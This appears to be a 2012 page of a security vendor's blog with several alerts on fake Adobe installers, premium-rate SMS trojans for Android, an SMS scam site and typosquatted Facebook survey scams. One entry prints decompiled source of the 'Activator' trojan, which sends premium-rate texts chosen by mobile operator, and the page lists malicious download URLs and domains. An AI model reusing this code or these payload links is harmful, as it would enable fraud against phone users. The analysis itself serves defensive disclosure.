[ Security Alert ] 30 July, 2012 15:16

    Last week, AegisLab found a strange domain name: hxxp://adobe-upgrade.org/w.php?f=28f52. Does it look like an official Adobe domain name ?! Actually it's not! It's registered by attacker in order to trick victim to download malicious program. After analyzing the program in depth, we found it's a fake AV. Once installed completely, it will show you the virus scaning page (Figure 1) and show how many files are infected in this computer. It's all fake but you will really get infected after the "scaning" finished :-)

   VirusTotal details

SHA256: e69d29b7b09449e64474b0caed08461f527b9ce1577f95f4ef3409e7424d5e36
SHA1: b0742f1f07e30620d0643029375786873d897177
MD5: 4c57cf16bbe1e1f5e8e38b3773f5e07a
File size: 404.0 KB ( 413696 bytes )
File name: about.exe
File type: Win32 EXE
Tags: peexe armadillo
Detection ratio: 7 / 41
Analysis date: 2012-07-23 05:55:56 UTC 


Figure 1: Fake virus scan page


by AegisLab 

[ Security Alert ] 27 July, 2012 10:18

    AegisLab discovered a fake Adobe Flash Player app in 3rd party market in Russia. Actually, it's a variant of FakeInst (aka OpFake, SMSSend or TrojanSMS) which tricks victim to download and install it, then send SMS to premium-rate number. The VirusTotal detection rate is shown as below:

SHA256: 95781ff40529e6647f02e96e96c2f5d86a31cf9d2f02592d6b7666068925a225
SHA1: a04718f91e86ee6619f910c76509c0e16724c356
MD5: 0d8d9ad5a98ce9d77462779036cf0295
File size: 317.0 KB ( 324634 bytes )
File name: adobe_flash_player_v10.3.185.25_installer.apk
File type: Android
Tags: android
Detection ratio: 2 / 41
Analysis date: 2012-07-26 06:47:48 UTC
After analyzing this malicious app and check the complex hyper links inside the app in-depth, we found the following Android Markets (or websites) are all malicious, which host many malicious apks (some are normal):
  • androidmir.com 和 android-mir.com (Figure 1)
  • myadroidmaklet.net ( Figure 2)
  • filedats.net ( Figure 3)
  • file77mibi.net
  • androidmarkt.ru

Figure 1: androidmir.com


Figure 2: myadroidmaklet.net


Figure 3: filedats.net


How do we find the above malicious websites? That's because one day while our WebGuard Team patrols on the Internet, the researcher finds a suspicious link to a Android APK called "Cool Reader". The link is not so simple and direct, it will redirect you to another page and jump to another site in order to evade the detection and tracking. Once you install the app completely, the fake app will issue an emergent update notification which tricks you to download another app. In the following figures, you will see the whole trick tips:

Figure 4: Cool Reader


Figure 5: fake installation process


Figure 6: fake disclaimer (can you see the notification on the upper-left corner?)


Figure 7: try to download another app


Figure 8: fake login page (just press Enter is ok)


Figure 9: lure you to link http://androidmir.com/download/cr3-0-45-07.apk (link is not existent)


Figure 10: the emergent update notification for Adobe Flash Player


Figure 11: connect to myadroidmaklet.net


While you are installing the fake Adobe Flash Player, you will see it require read/send SMS, read contact data and read GPS location permissions (Figure 12,13). Actually, normal Adobe Flash Player doesn't need such permissions.

Figure 12,13: fake Adobe Flash Player


Once the installation completed, you will find a shortcut on the desktop. After clicking, one "Browser" app will be downloaded and installed (Figure 14,15). The "Browser" app requires the same permissions as fake Adobe Flash Player (Figure 16,17). 


Figure 14,15: update browser ? (just a trick)


Figure 16,17: fake Browser


Yes, this kind of attack is old-fashioned and nothing special, but Android users are always being tricked. AegidsLab reminds you that only download apps from trusted Android Markets, never click suspicious links and install AegisLab Antivirus :-)

By AegisLab 


[ Security Alert ] 24 July, 2012 18:15

    AegisLab discovered a russian website called "google-file.com" which has a google style look(Figure 1). But actually it's not an official google service, it's a premium-rate SMS scam website. If you want to download some files(figure 2), you have to enter your phone number(figure 3) first and then the page will tell you to send texts to specific number in order to verify your identity(figure 4). Finally, you money will fly away(figure 5). 


Figure 1: Google-File.com


Figure 2: File to download


Figure 3: Input your phone number


Figure 4: Send premium-rate SMS to specific number


Figure 5: so many complaints to google-file.com


We also found "google-fiile.mk3k.ru", "google-fille.org", and "google-fiile.org" are redirecting to Google-File.com. AegisLab WebGuard has blocked these 4 websites! 


By AegisLab


[ Security Alert ] 20 July, 2012 14:33

    Last week, AegisLab published「Security Alert 2012-07-12: Malicious "Super Mario Bros." App in Google Play」, we mentioned that the 2nd stage infection is trying to download a apk - called "Activator.apk", the snippet code is listed as below marked as red color:

package com.activator;

import android.app.Activity;
import android.app.AlertDialog;
import android.app.AlertDialog.Builder;
import android.content.DialogInterface;
import android.content.DialogInterface.OnClickListener;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.TelephonyManager;
import java.util.Random;
import java.util.regex.Pattern;

public class ActivatorActivity extends Activity
TelephonyManager TM;
AlertDialog.Builder builder;
String operator;

private void sendSMS(String paramString1, String paramString2)
SmsManager.getDefault().sendTextMessage(paramString1, null, paramString2, null, null);

protected void onCreate(Bundle paramBundle)
this.TM = ((TelephonyManager)getSystemService("phone"));
this.operator = this.TM.getSimOperatorName();
if (Pattern.matches("[bBeEeE]*", this.operator.substring(0, 3)))
int k = 1 + new Random().nextInt(10000);
startProgress("1518", "DEF1773");
startProgress("3170", "4037" + k);

while (true)
if (Pattern.matches("[mMtTsS]*", this.operator.substring(0, 3)))
int j = 1 + new Random().nextInt(10000);
startProgress("770656", "DEF1773");
startProgress("3170", "4037" + j);

if (this.operator.equalsIgnoreCase(""))
this.builder = new AlertDialog.Builder(this);
this.builder.setMessage("Ошибка при загрузке базы обоев. Попробуйте позже.");
this.builder.setNeutralButton("OK", new DialogInterface.OnClickListener()
public void onClick(DialogInterface paramDialogInterface, int paramInt)
int i = 1 + new Random().nextInt(10000);
startProgress("3170", "4037" + i);


public void startProgress(String paramString1, String paramString2)

new Thread(new Runnable(paramString1, paramString2)
public void run()
ActivatorActivity.this.sendSMS(this.val$number, this.val$message);


Basically, it will send different message to different number based on different OperatorName:

operator = OperatorName()
Pattern.matches("[bBeEeE]*", operator.substring(0, 3))
number=1518, message="DEF1773"
number=3170, message="4037" + 1~10000 (any number)

Pattern.matches("[mMtTsS]*", operator.substring(0, 3))
number=770656, message="DEF1773"
number=3170, message="4037" + 1~10000(any number)

Case3(neither case 1 or case 2 and OperatorName is not empty)
number=3170, message="4037" + 1~10000(any number)

If operatorName is empty, a alert dialog will pop up - "Ошибка при загрузке базы обоев. Попробуйте позже." (translated by google - "Failed to load base wallpaper. Please try again later")

Because "Super Mario Bros." is masqueraded as a wallpaper app, this message just tricks you.

By AegisLab


[ Security Alert ] 12 July, 2012 17:57

    According to Symantec and F-Secure blogs, malicious "Super Mario Bros." app appears in Google Play for several days. It looks like a action game, but after installation completed, you will see icon display "Mario HD Wallpaper" as in Figure 2. Google Play has removed this app and some related apps with the same developer, but you can find the apps in 3rd-party market as in Figure 1. This app uses 2-stage or multi-stage infection technique in order to evade Google Play review. Simply speaking, the first stage app is usually harmless, but the second stage will download some malicious contents or another malicious apk to install.

In this app(Super Mario Bros.), we found 3 links to drop box are malicious, they all point to (http://dl.dropbox.com/u/87265868/Activator.apk) !


Obviously, you can see the second stage is to download "Activator.apk" and install. After installation completed, "Activator" will be launched and send premium-rate SMS (target Eastern-Euorpean area) and finally un-install itself.

Figure 1: We discovered it on 3rd-party market.


Figure 2: "Mario HD Wallpaper"


Figure 3: Russian disclaimer


Figure 4: Russian disclaimer


Figure 5: AegisLab Antivirus detected

VirusTotal detection rate:

According to the developer information, AegisLab discovered 5 related apps with the same developer and AegisLab Antivirus can detect them all.

By AegisLab 

[ Security Alert ] 12 July, 2012 13:55

    Remember the security alert we published before:「Security Alert 2012-05-29: Facebook URL Hijacking」, AegisLab discovered the website style in facenook.com and facevook.com look more similar as FB official website as in Figure 1.

Figure 1: Look so similar as Facebook style

Once you get into the page, you will hear the recording voice as follows:
"You have been selected to take part in our anonymous survey! 
Complete this 30 second questionnaire, and to say "thank you", we'll offer you an exclusive gift."

Click the "Start" button and then fill-in the answer:

Figure 2: Answer the questions


After answering the all 5 questions,  Best Buy and Walmart Gift Card win-prize page will pop-up as in Figure 3. (Don't even think about it, you'll never win the prize!)

Figure 3: Choose the gift card


After choosing the gift card you want, you have to input the cell phone number and e-mail address as in Figure 4. (OMG! Don't do that!)

Figure 4: Fill-in cell phone number and e-mail address

Congratulation! You have finished the questionnaire but all in vain, except leaking your sensitive information. (and will get more spam :-) )


By AegsiLab 

1 2  Next»